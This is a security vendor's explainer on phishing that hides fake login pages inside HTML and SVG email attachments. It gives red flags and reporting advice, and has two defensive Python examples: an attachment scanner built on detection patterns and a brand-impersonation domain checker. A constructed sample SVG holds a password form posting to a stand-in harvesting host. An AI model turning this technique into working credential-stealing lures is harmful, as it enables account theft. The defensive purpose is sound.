
HTML and SVG attachment phishing, explained in plain language

Instead of a link, the entire phishing page is attached to the email as a file. Open it and a fake login screen draws itself right inside your browser. There is no URL for the email filter to catch.

SafeBrowz Threat Research · Security Research · June 15, 2026 · 11 min read

The short version

A normal phishing email puts a link in the message and hopes you click it. Attachment phishing skips the link. The fake login page is shipped inside an .html or .svg file attached to the email. When you open the attachment, your browser renders that file from your own disk and shows you what looks like a real Microsoft, Google, or bank sign-in screen. There is no outbound link in the email body, so link scanners have nothing to flag. When you type your password, the page quietly posts it to the attacker. SVG files are the nastier of the two because an SVG is not really an image: it is text-based code that can carry JavaScript and draw a full working login form. Never type a password into a page that opened from an email attachment. Go to the real site yourself instead.

Why this gets past email security

Email filters are very good at one thing: looking at links. Every URL in a message gets rewritten, sandboxed, reputation-checked, and compared against blocklists. A brand-new phishing domain still has a domain, and a domain can be scanned, aged, and scored. That is the whole game for a normal phishing email.

Attachment phishing removes the thing the filter is built to inspect. The message body can be a single bland sentence, "Please review the attached document," with no link at all. The malicious content lives in a file. And a file named invoice.html or statement.svg looks boring. Many filters treat HTML and SVG as low-risk document or image types and do not unpack them with the same suspicion they apply to a .exe or a macro-laden Office file.

The payoff for the attacker is freshness. There is no domain to age, no link reputation to build. The phishing page only exists for the few seconds it takes your browser to render the file. By the time anyone reports the campaign, the attacker has already rotated to a new file name and a new template.

What actually happens when you open the attachment

Double-click the file and your operating system hands it to your default browser, because both .html and .svg are file types browsers open natively. The browser reads the file off your local disk and renders it. What you see is a login page, often a pixel-accurate copy of the Microsoft 365 sign-in screen, sometimes Google, sometimes a bank or an e-signature service.

Look at the address bar and you will not see a normal web address. You will see something that starts with file:// followed by a long path on your own computer, or, in the SVG-with-JavaScript case, a blob: address. That is the single biggest tell. A real login page is served from a real domain. A real Microsoft login lives on login.microsoftonline.com. A real Google login lives on accounts.google.com. A login page that opened from a file you just downloaded is not either of those, no matter how perfect the logo looks.

When you type your email and password and press sign in, the form does not log you in anywhere. It sends your credentials to a server the attacker controls, usually buried in the file as a hidden form action or a snippet of JavaScript. Many of these pages then redirect you to the genuine site with a "session expired" message, so the failed attempt feels like a glitch and you simply log in again on the real page without ever suspecting anything was wrong.

Why "it is just an image" is wrong for SVG

This is the part most people get caught by. A JPG or PNG is a grid of colored pixels and nothing else. It cannot contain a login form, it cannot run code, it cannot send your password anywhere. So when an attachment ends in an image extension, the instinct is to relax.

SVG breaks that instinct. SVG stands for Scalable Vector Graphics, and under the hood it is not pixels at all. It is XML, a text-based markup language, the same family as HTML. An SVG file is read as code, and that code can legitimately include HTML elements and <script> tags. Browsers honor that script when the SVG is opened directly as its own document. So an attacker can write an SVG that, the moment you open it, runs JavaScript that paints a complete Microsoft login form on the screen and wires it up to steal what you type. The "image" is a program.

Security researchers at Kaspersky documented exactly this pattern in their Securelist write-up on SVG phishing: SVG files with embedded HTML and JavaScript that launch a fake Microsoft sign-in page, including campaigns disguised as e-signature notifications. The technique works precisely because so many tools, and so many people, still treat anything ending in an image extension as harmless.
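The markers the two sections above describe (script inside an "image", HTML wrapped in an SVG, a password field, a form action that posts what you type somewhere else) are exactly what a mail gateway can look for before the file ever reaches a browser. The triage below is an added example written for this article, not SafeBrowz code; the file names, indicator list and sample files are constructed, and the suspicious sample is a bare placeholder, not a working lure.

```python
import os
import re
from urllib.parse import urlparse

# Constructs the article describes: script that draws the form, HTML inside an
# SVG, a password field, and a form action or redirect that carries what you
# type off the machine. Plain drawings and ordinary documents have none of these.
INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "foreign_object": re.compile(r"<\s*foreignObject\b", re.I),
    "password_input": re.compile(r"<\s*input\b[^>]*type\s*=\s*[\"']?password", re.I),
    "meta_refresh": re.compile(r"http-equiv\s*=\s*[\"']?refresh", re.I),
    "decoded_payload": re.compile(r"\batob\s*\(|data:text/html;base64", re.I),
}
FORM_ACTION = re.compile(
    r"<\s*form\b[^>]*\baction\s*=\s*[\"']?(https?://[^\"'\s>]+)", re.I)
BROWSER_RENDERED = (".html", ".htm", ".svg")


def triage_attachment(filename: str, content: str) -> dict:
    """Report which indicators fire and which hosts any form posts to."""
    result = {"filename": filename, "hits": [], "post_targets": [], "risky": False}
    if os.path.splitext(filename)[1].lower() not in BROWSER_RENDERED:
        return result  # not a file the browser would open as a page
    for label, pattern in INDICATORS.items():
        if pattern.search(content):
            result["hits"].append(label)
    for url in FORM_ACTION.findall(content):
        result["post_targets"].append(urlparse(url).hostname)
    # Script or HTML inside an "image", a password field, or a form that posts
    # anywhere at all: any one is reason to hold the message for review.
    result["risky"] = bool(result["hits"] or result["post_targets"])
    return result


# Constructed samples for this example: a harmless drawing and a file carrying
# the markers above (the form here is a placeholder, not a working lure).
BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'
SUSPECT_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg"><foreignObject>'
    '<form action="https://harvest.example.invalid/post">'
    '<input type="password" name="pw"></form></foreignObject>'
    '<script>/* constructed marker */</script></svg>'
)

if __name__ == "__main__":
    for name, body in (("chart.svg", BENIGN_SVG), ("scan_0421.svg", SUSPECT_SVG)):
        print(triage_attachment(name, body))
```

Any `post_targets` host the check reports is the follow-up domain the article talks about, and is what a link checker can then be pointed at.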

How fast this is growing

This is not a fringe trick. It went mainstream through 2025 and into 2026.

KnowBe4 reported a 245% increase in SVG files used to hide phishing payloads. Threat researchers tracking the trend found a sharp spike in SVG campaigns in March 2025, with thousands of these emails caught in the first quarter alone, and SVG attachments climbing to a meaningful share of all attachment-based phishing by mid-year. In September 2025, Microsoft's own security team detailed a campaign where the payload appeared to be AI-generated, disguised as a business analytics dashboard inside the SVG, with polymorphic file names and subjects that changed on every message to defeat hash-based detection. Microsoft's write-up, AI vs. AI: detecting an AI-obfuscated phishing campaign, walks through how the file masqueraded as a shared PDF before redirecting to a CAPTCHA and then a credential-harvesting page.

HTML attachments are the older cousin and remain heavily used. The two are functionally the same idea: ship the phishing page as a file so the email carries no link. SVG simply added a layer of evasion, because filters that learned to scrutinize HTML attachments were slower to treat image files the same way.

Live check: if an attachment ever bounces you to a real web address, copy that address and check it with the SafeBrowz link checker before you type anything. The 3-layer engine (Local + APIs + AI) returns a verdict in about 3 seconds. It is free, needs no signup, and no URL is logged to your identity.

A common next step in these campaigns is a real follow-up domain. The attachment shows the fake form, and once you submit, it forwards your details to a live phishing host, often a throwaway page on a free hosting service like office365-verify-login.vercel.app. That kind of address is exactly what SafeBrowz flags. Paste it into the checker above and watch it come back as a brand-impersonation phish, because it borrows a Microsoft product name on a domain Microsoft does not own.

Red flags that should stop you cold

  • An unexpected .html, .htm, or .svg attachment. Real invoices, receipts, and shared documents arrive as PDF, Office files, or a link to a known portal. A web-page or image file attached to a "review this document" email is abnormal. Treat it as hostile until proven otherwise.
  • "Open the attached document to view" or "open to sign in." Legitimate services send you to their website to sign in. They do not ship the sign-in screen as a file you have to open.
  • A login form that loads from a file:// or blob: address. Look at the address bar the instant a sign-in page appears. If it does not start with https:// followed by a real domain, it is not a real login page. Full stop.
  • The page asks for your password right after you opened a downloaded file. The sequence "I just opened an attachment, now I am being asked to log in" is the whole attack. Stop there.
  • The email body is almost empty. A single line like "Please find attached" with no link and no detail is a hallmark of attachment phishing, because the attacker is keeping the message clean so filters find nothing to scan.
  • An e-signature or file-sharing notification you were not expecting. Fake DocuSign and "shared PDF" lures are a favorite wrapper for SVG payloads. If you did not initiate the document, verify before opening.
  • The file name looks generic or scrambled. scan_0421.svg, invoice.html, or randomized names that change between recipients are built to dodge hash-based detection, not to inform you.
  • Your password manager refuses to autofill. A manager binds saved logins to the exact real domain. When it stays silent on a "login page," that silence is telling you the page is not the real site.

What to do instead

The defense is short and it does not require any technical skill. Never enter a password into a page that opened from an email attachment. If you genuinely need to log into Microsoft, Google, your bank, or any service, close the attachment, open a new tab, and type the address yourself or use a saved bookmark. Sign in there. If the message was real, your account or document will be waiting for you. If it was a phish, you just walked straight past it.

If you already opened one of these files, opening it alone did not give anything away. The danger is only the moment you type credentials. If you did type a password, change it immediately on the real site from a fresh tab, change it anywhere else you reused it, and turn on two-factor authentication so a stolen password is not enough on its own. For a deeper walkthrough of confirming whether a message is genuine, see our guide to verifying whether an email is real.

How to report it

Reporting helps the campaign get shut down for everyone else.

  • In your email client, use Report phishing or Report junk rather than just deleting. That feeds the provider's filters directly.
  • At work, forward it to your IT or security team so they can block the sender and warn colleagues.
  • In the United States, report to the FTC at reportfraud.ftc.gov and, if money or accounts were lost, to the FBI at ic3.gov.
  • To the impersonated brand: Microsoft, Google, and most banks all run an abuse or phishing report inbox. Forwarding the sample helps them take down the follow-up infrastructure.

FAQ

Can opening an HTML or SVG attachment hurt me even if I do not type anything?

For the credential-phishing case, no. The danger is the fake login form, and that only costs you something when you type a password and submit it. Opening the file shows you the page; entering credentials is what hands them over. That said, do not make a habit of opening unexpected attachments, and never enter anything into a page that opened from a file.

Is an SVG file really able to run code? It looks like an image.

Yes. SVG is XML, a text-based markup language, not a grid of pixels like JPG or PNG. It can legitimately include HTML and <script> tags, and a browser will run that script when the SVG is opened directly as its own document. That is exactly what these phishing files abuse to draw and wire up a fake login form.

Why does my email provider let these files through?

Email filters are built to inspect links, and attachment phishing carries no link in the message. HTML and especially SVG files were long treated as low-risk document or image types and were not unpacked as aggressively as executables. Providers are catching up, but attackers rotate file names and templates on every message to stay ahead of signatures.

How do I know if a login page is fake?

Check the address bar. A real login is served over https:// from the brand's real domain (a real Microsoft login is on login.microsoftonline.com). If the address starts with file:// or blob:, or shows any domain that is not the brand's own, it is fake. Our guide to telling if a website is a scam covers the URL checks in detail.

How is this different from a normal phishing link?

A normal phish puts a link in the email and the fake page lives on a web server. Attachment phishing ships the fake page as a file, so the email has no link to scan and the page renders from your own disk. The end goal, stealing your password, is the same; the delivery hides from link-based defenses.

Does this only target Microsoft accounts?

Microsoft 365 is the most common lure because work accounts are valuable, but the same technique impersonates Google, banks, and e-signature services like DocuSign. See our DocuSign phishing breakdown and our guide to spotting Microsoft phishing emails for the brand-specific versions.

Will antivirus catch a malicious SVG?

Sometimes, but do not rely on it. Because the SVG carries no traditional malware, only a login form and a form action, many engines see nothing executable to quarantine. Your own habit, never logging in from an attachment, is the dependable defense.

How SafeBrowz blocks this threat

An attachment opens locally on your own machine, so we are honest about the boundary: SafeBrowz does not scan files sitting on your disk. What it does catch is the moment the attack reaches the network. Almost every one of these fake forms has to send your credentials somewhere, and many redirect you to a live phishing host first. That destination is a domain, and a domain is exactly what our engine inspects.

SafeBrowz runs a 3-layer detection architecture: Local + APIs + AI.

  • Layer 1 - Local detection: 60+ URL patterns plus 550+ brand-specific signatures (including Cyrillic and Punycode homograph variants) and a community whitelist/blacklist, all running directly in the extension before the destination page renders. The instant a fake form tries to submit to, or redirect you toward, a Microsoft- or Google-looking domain that is not the real one, the brand-on-wrong-domain check fires.
  • Layer 2 - API checks: aggregates Google Safe Browsing, PhishTank, URLhaus, ScamAdviser, and 30+ scam TLD lists to catch destinations already known to be malicious.
  • Layer 3 - AI deep scan (Premium): 100+ language content analysis reads the landing page itself and flags a credential-harvesting clone of a brand it does not officially own, catching novel variants in seconds.
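The Layer 1 brand-on-wrong-domain rule, including the Punycode and Cyrillic homograph folding it mentions, sketched from scratch as an added example; this is not SafeBrowz's engine, and the allowlist of brand-owned domains, the brand word list and the homoglyph table are assumed and abbreviated for illustration.

```python
from urllib.parse import urlparse

# Assumed, abbreviated allowlist of sign-in domains each brand actually owns.
BRAND_OWNED = {
    "microsoft": {"microsoftonline.com", "microsoft.com", "live.com",
                  "office.com", "outlook.com"},
    "google": {"google.com", "gmail.com"},
}
# Brand words whose presence in a hostname triggers the check.
BRAND_WORDS = {
    "microsoft": ("microsoft", "office365", "outlook", "onedrive"),
    "google": ("google", "gmail"),
}
# A handful of Cyrillic letters that render like Latin ones (real tables are longer).
HOMOGLYPHS = str.maketrans({
    "\u0430": "a", "\u0435": "e", "\u043e": "o",
    "\u0440": "p", "\u0441": "c", "\u0456": "i",
})


def normalize_host(host: str) -> str:
    """Decode Punycode (xn--) labels and fold lookalike letters to Latin."""
    if host.isascii():
        host = host.encode("ascii").decode("idna")
    return host.lower().translate(HOMOGLYPHS)


def registrable(host: str) -> str:
    # Naive: the last two labels. Production code needs the Public Suffix List
    # so that co.uk-style suffixes are handled correctly.
    return ".".join(host.split(".")[-2:])


def brand_on_wrong_domain(url: str):
    """Return the impersonated brand, or None if no brand word is misused."""
    folded = normalize_host(urlparse(url).hostname or "")
    base = registrable(folded)
    for brand, words in BRAND_WORDS.items():
        if any(word in folded for word in words):
            # A brand word on a domain the brand owns is fine; anywhere else it fires.
            return None if base in BRAND_OWNED[brand] else brand
    return None


if __name__ == "__main__":
    for u in ("https://login.microsoftonline.com/",
              "https://office365-verify-login.vercel.app/",
              "https://accounts.google.com.evil.example/"):
        print(u, "->", brand_on_wrong_domain(u))
```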

Detection signatures are derived from threat-intelligence research and our internal brand database, not from user browsing data. SafeBrowz does not store per-user browsing history.

Catch the phishing domain the attachment redirects to

SafeBrowz watches the destination an attachment-based phish has to reach, the moment a fake form submits or redirects to a domain impersonating a brand it does not own. The extension is free forever for phishing and brand-impersonation blocking. Premium adds wallet-drainer detection and AI-based scam analysis.
